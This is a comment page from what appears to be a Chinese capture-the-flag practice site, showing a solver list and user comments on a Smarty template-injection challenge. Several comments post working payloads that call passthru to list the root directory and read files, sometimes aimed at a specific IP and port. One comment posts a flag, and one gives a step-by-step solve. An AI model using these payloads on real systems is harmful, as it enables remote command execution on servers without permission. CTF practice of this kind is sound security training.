评分(11)
解题动态
![](/static/images/face.webp)
ryoumiya 攻破了该题 1天前
![](/static/images/face.webp)
zayxshawn 攻破了该题 2天前
![](/static/images/face.webp)
2832029804 攻破了该题 2天前
![](/static/images/face.webp)
死在回忆里 攻破了该题 4天前
![](/static/images/face.webp)
zc341 攻破了该题 5天前
![](/static/images/face.webp)
凶残炒土豆 攻破了该题 7天前
![](/upload/user/20240718/a119638564e3ca270d1456696e777bf7.webp)
XmN<=GzR 攻破了该题 7天前
![](/static/images/face.webp)
xxxx3803 攻破了该题 8天前
![](/static/images/face.webp)
3263235457 攻破了该题 8天前
![](/static/images/face.webp)
13245768 攻破了该题 8天前
![](/static/images/face.webp)
上天堂的 攻破了该题 8天前
![](/static/images/face.webp)
泡芙hjz 攻破了该题 9天前
![](/static/images/face.webp)
幽樱漫舞 攻破了该题 9天前
![](/static/images/face.webp)
youz1an 攻破了该题 9天前
![](/upload/user/20210404/e7d36da1ea56aacf22c848c1e5bd2112.webp)
Kevin_xiao 攻破了该题 10天前
![](/upload/user/20240714/32f074ccbd9b87c26e6672f5fe705aaf.webp)
mmmiao 攻破了该题 11天前
![](/static/images/face.webp)
花和尚123 攻破了该题 12天前
![](/static/images/face.webp)
q1152874733 攻破了该题 12天前
![](/static/images/face.webp)
神级菜鸟 攻破了该题 13天前
![](/static/images/face.webp)
评论
yun20231227 15天前
举报
?key={{passthru('ls /')}}
xinkuang 2月前
举报
http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}
YUMEKO 4月前
举报
http://xxxxxxx/?key={{passthru('tac ../../../_16018')}} key_16018 别看错了
Daniel2023 5月前
举报
flag{0e54d64e616af92957ddbb6c6ea37c5f}
一路奔腾 6月前
举报
?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120
EtHat 8月前
举报
index.php?a={passthru("tac /_4060")}
FUCK123 2月前
举报
fnmdp
18904484271 8月前
举报
好垃圾的靶场,明明flag出来了,但是提交显示不正确
haker111 9月前
举报
看提示直接传值:?a,然后看到源码后进行解析,了解smarty模板。进行get传参,?a={if passthru('ls')}{/if} 查看当前目录,然后转到根目录下,?a={if passthru('ls /')}{/if},每个人的根目录下的第一个子目录不同,所以flag不同,查看第一目录?a=?a={if passthru('tac /_2096')}{/if},得到flag{...}
XRain 10月前
举报
没想起来 PHP 还有什么函数可以执行命令。不过,我用 scandir() 和 show_source() 就完成挑战了。 /?a={var_dump(scandir("/"))} 和 /?a={show_source("/_6583")}
冯飞99 11月前
举报
根据给出的提示发现可以通过/?回显得到源码,然后找到chatgpt解析一下源码,得知需要模板注入,构成payload,找到第二个源码再次让gpt翻译一下,得知在根目录下有个-数字的文件,由于cat命令用不了,使用tac命令查看得到flag。